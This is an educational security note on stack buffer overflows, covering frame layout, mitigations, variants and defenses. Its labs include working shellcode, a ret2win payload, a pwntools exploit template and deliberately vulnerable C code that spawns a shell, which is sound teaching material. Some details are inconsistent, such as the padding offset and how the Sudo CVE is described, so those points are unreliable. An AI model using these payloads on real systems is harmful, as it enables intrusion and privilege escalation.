Stack Buffer Overflow

Definition

A stack buffer overflow is the memory-corruption sub-class where a function's local buffer — a fixed-size array allocated on the call stack — receives more data than it has space for, so the write spills into adjacent stack memory. The overwritten memory typically includes other local variables, the saved frame pointer, and (most dangerously) the saved return address that controls where the function returns to. The class is the canonical entry point for binary-exploitation education because it makes every concept concrete: stack layout, return-address control, the gap between bug and exploit, the role of every modern mitigation.

Why it matters

The stack buffer overflow taught a generation of security researchers because all five questions of exploitation appear in one bug:

Where is the bug (the function with the unbounded write)?
What state can I corrupt (saved return address, locals, frame pointer)?
How do I redirect control (overwrite the return address)?
Where do I send execution (a controllable address — shellcode in 1996, a ROP gadget in 2026)?
How do I defeat the mitigations (canary, ASLR, DEP, CET) standing in the way?

Modern stack overflows in production C/C++ are rarer than they used to be — strcpy is fortified, compilers emit canaries by default, ASLR is universal. But they still produce critical CVEs annually (CVE-2021-3156 / Sudo "Baron Samedit" was a stack-adjacent off-by-one; the Linux kernel ships fixes for stack-bounds bugs in most releases). More importantly, the stack overflow is the model from which every other memory-corruption exploitation pattern is taught — the layered mitigation-defeat reasoning (info leak → canary bypass → ROP chain → arbitrary execute) generalizes to heap overflows, UAF, and type confusion.

The class also matters as a teaching note because it surfaces three transferable senior facts:

Stack overflows are the most-mitigated bug class in computing history. Stack canaries, ASLR, DEP, non-executable stack, shadow stacks (Intel CET), pointer authentication (ARM PAC), Control Flow Integrity — almost the entire exploit-mitigation landscape was built to make this bug harder to exploit. The arms race is the history of binary defense.
Mitigation defeat is composable. No single modern mitigation stops exploitation alone; defeating each takes a separate primitive. A stack overflow exploit in 2026 typically chains an info leak (defeat ASLR + read the canary) with a ROP gadget chain (defeat DEP) with possibly a CET-aware control-flow target (defeat shadow stacks). The compositional reasoning is what makes binary exploitation an engineering discipline rather than a recipe.
strcpy is not the only sink. Beginners think "the bug is strcpy". The real bug is "any write whose length is not bounded by the destination size" — strcat, sprintf, gets, read with attacker-controlled length, hand-written copy loops, memcpy after integer overflow in length. Pattern-matching on function names misses real bugs.

This note assumes you have read memory-corruption. It is the deep-dive worked example of class 1 (stack-based corruption) from that note.

How it works

A typical x86-64 stack frame for a function with a local buffer looks like this (high addresses at top, stack grows downward toward low addresses):

HIGH ADDRESSES
   ┌──────────────────────────────┐
   │ caller's frame               │
   ├──────────────────────────────┤
   │ argument bytes (if > regs)   │
   ├──────────────────────────────┤
   │ return address  ◀───────────────── target of the overflow
   ├──────────────────────────────┤
   │ saved RBP (frame pointer)    │
   ├──────────────────────────────┤
   │ stack canary (if -fstack-protector enabled)  ◀── tripwire
   ├──────────────────────────────┤
   │ other local variables        │
   ├──────────────────────────────┤
   │ char buf[64]  ◀──────────────────── the buffer being overflowed
   │   (writes grow toward HIGH)  │
   └──────────────────────────────┘
LOW ADDRESSES

The mechanism reduces to 5 steps:

A function declares a fixed-size local buffer (e.g., char buf[64]). The buffer sits at the low end of the function's stack frame.
An unbounded write copies attacker-controlled data into the buffer, either because the length is not checked (strcpy(buf, attacker_input)) or because the length check is wrong (integer overflow, off-by-one, sign-confusion).
The write spills past the end of the buffer, climbing toward higher addresses through other locals, the saved frame pointer, and the saved return address.
When the function executes its ret instruction, the CPU pops what is now the overwritten return address into rip.
Execution continues at the attacker-controlled address. With no mitigations, this is shellcode placed on the stack; with modern mitigations, this is the start of a ROP chain pointing into gadgets from non-randomized regions, or a JIT-spray target, or an entry point in libc.

A representative end-to-end example. The vulnerable program:

#include <stdio.h>
#include <string.h>

void greet(char *name) {
    char buf[64];
    strcpy(buf, name);                  // bug
    printf("Hello, %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    greet(argv[1]);
    return 0;
}

Compiled with all mitigations disabled (for didactic purposes):

gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.c

The classic 1996 exploit shape works: place shellcode at the start of the input, pad to the saved return address offset (typically 64 buf bytes + 4-byte saved EBP = 68 bytes), then write 4 bytes pointing to the stack address where the shellcode lives.

# Approximate one-shot exploit against the unprotected binary.
./vuln $(python3 -c '
import sys
shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
padding = b"A" * (76 - len(shellcode))
ret_addr = b"\xff\xff\xff\xbf"   # somewhere in stack region
sys.stdout.buffer.write(shellcode + padding + ret_addr)
')

The bug is not "strcpy is unsafe"; it is the write length was not bounded by the destination size, and the saved return address sits in the path the write traverses.

Techniques / patterns

The first task of an exploit is locating the saved return address. Disassemble the vulnerable function (gdb vuln, then disas greet). Calculate the buffer's offset from the stack frame's rbp. Add +8 (x86-64, saved RBP) to reach the saved return address. Pattern-cyclic helpers (pattern_create.rb, cyclic in pwntools) generate non-repeating input so you can compute the exact offset from a crash.
pwntools is the standard toolkit for exploit development. Python library + CLI that handles process spawning, payload construction, byte-string arithmetic, ROP-gadget search via ROPgadget/one_gadget, and shellcode generation. Senior exploit code is short and pwntools-shaped.
Modern stack overflows require a chain, not a single payload. The chain typically: 1. Trigger an info leak primitive (a separate bug, often an out-of-bounds read in a different code path, or a format-string vulnerability) to learn the stack canary, the libc base address, and the PIE base. 2. Compute ROP gadgets at known offsets from the leaked libc base. 3. Use the stack overflow to overwrite the saved return address with the address of the first ROP gadget, followed by the rest of the chain.
Identify the right ROP chain. ROPgadget --binary libc.so.6 enumerates available gadgets; one_gadget libc.so.6 finds "one-shot" gadgets that spawn a shell given a single jump. Modern libc one-gadgets have preconditions (specific register state); senior usage validates the preconditions match what the overflow leaves on the stack.
Defeat stack canaries with leak or brute force. A canary is a random value placed between local variables and the saved return address; the function's prologue stores it, the epilogue checks it, and __stack_chk_fail aborts on mismatch. Defeating: (a) leak the canary via a separate info-leak bug — this is the common path; (b) brute-force per-byte for forking servers that re-randomize on each child fork (only works on networked services where the canary doesn't change between forks).
Compiler warnings and -D_FORTIFY_SOURCE=3 flag many cases at build time. Static analysis catches many strcpy(buf, input) patterns where the destination is a known-fixed-size buffer. Senior code is built with both, and treats every warning as a finding.

Variants and bypasses

Stack-based corruption splits into 4 operational variants.

1. Classic return-address overwrite

The textbook case described above. Writes past the buffer to reach the saved return address. Requires: bug in a function that has a buffer, no canary or canary-bypass, knowledge of the return-address target. Largely defeated on modern systems by SSP + ASLR + DEP unless chained with other primitives.

2. Frame-pointer overwrite (off-by-one)

A common bug shape: the writeable region extends by exactly one byte past the buffer, overwriting only the low byte of the saved frame pointer. After the function epilogue, rsp and rbp are now slightly skewed — the next function's stack frame is shifted, and its return address is now in attacker-controllable memory. Subtle and historically widely exploited.

3. Local-variable corruption (no return overwrite)

The write does not reach the saved return address, but corrupts an adjacent local variable — a function pointer, a security-decision flag, a length value used in a subsequent allocation. Exploitation uses the corrupted local for code execution or for the next memory-corruption primitive. Bypasses stack canaries entirely (canary sits between locals and return address; in-frame corruption doesn't cross the canary).

4. Stack-allocated structure with embedded function pointer

A local C++ object on the stack with a vtable, or a local struct with callback function pointers. The overflow corrupts the vtable or the function-pointer field; the next call through it transfers control to attacker-chosen code. Same general approach as variant 3 but more reliable because the corrupted target is a control-flow primitive.

Impact

Ordered by typical real-world severity:

Arbitrary code execution in the vulnerable process. The canonical RCE outcome. If the process runs with elevated privileges (root, SYSTEM, kernel mode), the impact escalates accordingly.
Privilege escalation via setuid/setgid binaries. A stack overflow in a setuid program (sudo, network daemons running as root) yields root with one bug. CVE-2021-3156 (Sudo Baron Samedit) is the recent canonical case.
Kernel privilege escalation. Stack overflow in a kernel ioctl handler or system call yields kernel-context code execution and full system compromise. Mitigations are stronger in kernel space (SMEP, SMAP, KASLR) but still produce critical CVEs annually.
Denial of service via abort. Stack canary detection produces a controlled abort rather than silent corruption; canary-detected overflow is a DoS rather than an RCE. Net positive for defenders.
Information disclosure via out-of-bounds read on the stack. Some "stack overflow" CVEs are actually out-of-bounds reads (reading past the buffer rather than writing past it) that leak adjacent stack contents — canaries, saved registers, PIE base.

Detection and defense

Ordered by effectiveness:

Compile with -fstack-protector-strong (canary) plus -D_FORTIFY_SOURCE=3 (compile-time + runtime checks on glibc string/memory operations). The first-line defense. Canaries detect the classic return-overwrite shape; FORTIFY_SOURCE catches many strcpy-family calls into known-fixed-size destinations at compile time, replacing them with size-checked variants at runtime.
Compile with -fPIE -pie -fcf-protection=full and link with -Wl,-z,now -Wl,-z,relro. PIE (Position Independent Executables) + ASLR randomizes the binary's load address — attacker must defeat ASLR to know gadget addresses. CET enables Intel's hardware shadow stack and indirect-branch tracking — defeats most ROP chains. RELRO marks the GOT read-only after relocations, defeating GOT-overwrite primitives.
AddressSanitizer in development and CI. gcc/clang -fsanitize=address instruments every memory access. Catches stack-buffer-overflow at the moment of the bug rather than at the eventual crash point, with full stack trace. The development-time complement to the production mitigations above. See memory-corruption §Detection-and-defense.
Fuzzing every input parser. Coverage-guided fuzzing (libFuzzer, AFL++) finds stack overflows by exploring code paths until something crashes. Combined with ASAN, the bug is reported at the precise source line. Industry standard for browsers, OS components, network protocols.
ARM Pointer Authentication (PAC) on supported hardware. ARMv8.3+ feature: return addresses are signed with a per-process key before being saved to the stack and verified before use. A corrupted return address fails the verification and the CPU traps. Apple A12+ ships with PAC enabled; Android Pixel devices use it; servers are increasingly enabling it.
Modern compiler defaults catch many cases automatically. GCC -O2 with default flags on a modern distribution already enables stack canary on functions with character buffers, fortifies string functions, and emits CET-aware code. Even unattended code gets meaningful baseline protection.

What does not work as a primary defense

"We use strncpy instead of strcpy." strncpy does not null-terminate when truncating; many strncpy users introduce a new bug (missing terminator → subsequent reads run off the end). Use strlcpy (BSD) or snprintf(dest, sizeof(dest), "%s", src) instead, and verify the result is what you expected.
"We checked the length before calling strcpy." Common pattern: if (strlen(input) < sizeof(buf)) strcpy(buf, input);. strlen walks until null; if input is not null-terminated, the check itself reads out of bounds. Fix is strnlen with an upper bound, or use a size-bounded copy unconditionally.
"This function isn't called from untrusted input." Code grows. The function that was internal-only in 2018 is called from a network handler in 2024. Defense in depth assumes the boundary will move.
"Stack canaries make this safe." Canaries detect return-address overwrites; they do not detect adjacent-local-variable corruption (variant 3 above) or frame-pointer-only overwrites that only flip a few bytes (variant 2). Layered mitigations are the answer; canaries alone are not.

Practical labs

Run only against owned lab environments. The labs use intentionally vulnerable code; do not deploy.

// Lab 1 — Minimal target. Save as vuln.c.
#include <stdio.h>
#include <string.h>
void win(void) { puts("win() called"); system("/bin/sh"); }
void greet(char *name) {
    char buf[64];
    strcpy(buf, name);
    printf("Hi %s\n", buf);
}
int main(int argc, char **argv) {
    if (argc > 1) greet(argv[1]);
    return 0;
}

# Lab 1 (cont.) — Build with mitigations OFF and find the offset to the saved RIP.
gcc -fno-stack-protector -no-pie -O0 -g -o vuln vuln.c
# Generate a cyclic pattern to identify exact return-address offset:
python3 -c "from pwn import cyclic; import sys; sys.stdout.buffer.write(cyclic(200))" > input.bin
gdb -q ./vuln -ex "run < input.bin" -ex "info registers rip" -ex quit
# Take the rip value, feed it back to cyclic_find() to learn the offset:
python3 -c "from pwn import cyclic_find; print(cyclic_find(0x6161616e))"
# Output: the offset where saved RIP begins. Use this in the exploit.

# Lab 2 — Ret2win: overwrite saved RIP to jump to win().
WIN_ADDR=$(objdump -t ./vuln | awk '/ win$/ {print "0x"$1}')
OFFSET=72   # from Lab 1; will vary on your build
python3 -c "
import sys
from struct import pack
payload = b'A'*${OFFSET} + pack('<Q', ${WIN_ADDR})
sys.stdout.buffer.write(payload)
" > exploit.bin
./vuln "$(cat exploit.bin)"
# Expected: 'win() called' and a shell, demonstrating saved-RIP control.

# Lab 3 — Re-build with stack canary; observe canary detection.
gcc -fstack-protector-strong -no-pie -O0 -g -o vuln_canary vuln.c
./vuln_canary "$(cat exploit.bin)"
# Expected: '*** stack smashing detected ***: terminated'.
# The exploit primitive (return-address overwrite) is unchanged; the canary check turns RCE into DoS.

# Lab 4 — ASAN catches the bug at the moment of corruption, with full trace.
gcc -fsanitize=address -O0 -g -o vuln_asan vuln.c
./vuln_asan "$(python3 -c 'print("A"*200)')"
# Expected: ASAN output:
#   ==XXXX==ERROR: AddressSanitizer: stack-buffer-overflow
#   WRITE of size N at 0x... thread T0
#   ...
# Points at the strcpy call in greet(). The CI version of this catch is the standard development control.

# Lab 5 — Inspect the compiler-emitted mitigation primitives.
gcc -O2 -fstack-protector-strong -fcf-protection=full -c vuln.c -o vuln.o
objdump -d vuln.o | head -60
# Expected: function prologue loads %fs:0x28 (the canary), prologue stores it
# to the stack, epilogue compares and calls __stack_chk_fail if changed.
# `endbr64` instructions appear at indirect-branch targets (CET ENDBRANCH).

# Lab 6 — pwntools end-to-end exploit (templated).
cat > exploit.py <<'EOF'
from pwn import *
context.binary = elf = ELF("./vuln")
WIN = elf.symbols["win"]
OFFSET = 72                              # from cyclic-find in Lab 1
payload = b"A" * OFFSET + p64(WIN)
io = process(["./vuln", payload.decode("latin-1")])
io.interactive()
EOF
python3 exploit.py
# Standard pwntools shape. Every exploit you'll write later starts from this template.

Practical examples

CVE-2021-3156 (Sudo "Baron Samedit"). Heap-adjacent stack-style off-by-one in Sudo's command-line parser. The bug existed since 2011 in essentially every Linux distribution. Despite ASLR, stack canaries, and PIE, an attacker who can run sudoedit locally gets root. Demonstrates that mature, widely-audited code (Sudo) is not immune.
OpenSSH pre-auth stack bugs (historical: CVE-2003-0693 et al.). Multiple historical OpenSSH bugs allowed remote attackers to trigger stack corruption before authentication. Each spurred new defensive engineering (privilege separation, SSH compartmentalization). Modern OpenSSH ships with separately-running privileged and unprivileged processes specifically to limit the blast radius of any remaining bug of this class.
Linux kernel stack overflows in legacy filesystems (e.g., CVE-2016-9555). Crafted filesystem images overflow stack buffers in kernel filesystem drivers, yielding kernel-context code execution. The reason "do not mount untrusted disks" is repeated advice even in 2026.
CTF-grade ret2libc / ret2csu chains. Standard category in Pwn CTFs: stack overflow + libc base leak via printf format-string bug + ret2csu gadget chain to call system("/bin/sh") despite ASLR + DEP + canary. The teaching pattern that distills the entire modern-mitigation-defeat curriculum.
CI catches the bug pre-deploy. A new image-parsing library is added to a microservice. The team's mandatory fuzzing CI (libFuzzer + ASAN) finds a stack overflow in 12 seconds of fuzzing on the new code. The bug never reaches production. This is the modal real-world outcome for organizations that invest in instrumentation.

memory-corruption — the parent class this note specializes; read first if not done.
exploit-mitigations — the layered defenses that defeat the simple form of this bug and force exploit chaining.
CIA triad — stack overflow is a textbook integrity failure (program state changed without authorization) that enables further breaches.
Attacker-Defender Duality — the duality is especially visible in stack-overflow history: every offensive technique produced a corresponding defensive mitigation.
EDR / process correlation — modern EDR catches many ROP-based exploitation attempts via control-flow anomalies.
Windows Privilege Escalation — kernel stack overflows are one of the listed privesc primitives in that note; the bug class spans user-space and kernel-space.

Suggested future atomic notes

rop-and-ret2libc — the technique stack-overflow exploits use once DEP makes stack-shellcode impossible.
aslr-pie-and-info-leak-chains — the information-leak primitives needed to defeat ASLR before a ROP chain can land.
stack-canaries-and-shadow-stacks — how SSP and Intel CET shadow stacks work mechanically.
format-string-bugs — the canonical info-leak primitive paired with stack overflows in CTF and real-world chains.
off-by-one-and-frame-pointer-overwrite — variant 2 deep dive.
pwntools-exploit-development-patterns — the toolkit-level practice note.
fuzzing-with-libfuzzer-and-afl — the discovery side of the defender pair (paired with memory-corruption §Practical-labs Lab 5).
detect-stack-overflow-exploitation — defender-side playbook pair.

References

Foundational: Aleph One — Smashing the Stack for Fun and Profit (Phrack 49, 1996) — http://phrack.org/issues/49/14.html
Research / Deep Dive: Dennis Andriesse — Practical Binary Analysis (No Starch Press, 2018) — chapters on stack-based exploitation and modern mitigations
Official Tool Docs: pwntools — https://docs.pwntools.com/
Research / Deep Dive: Intel — Control-flow Enforcement Technology (CET) specification — https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

Reference system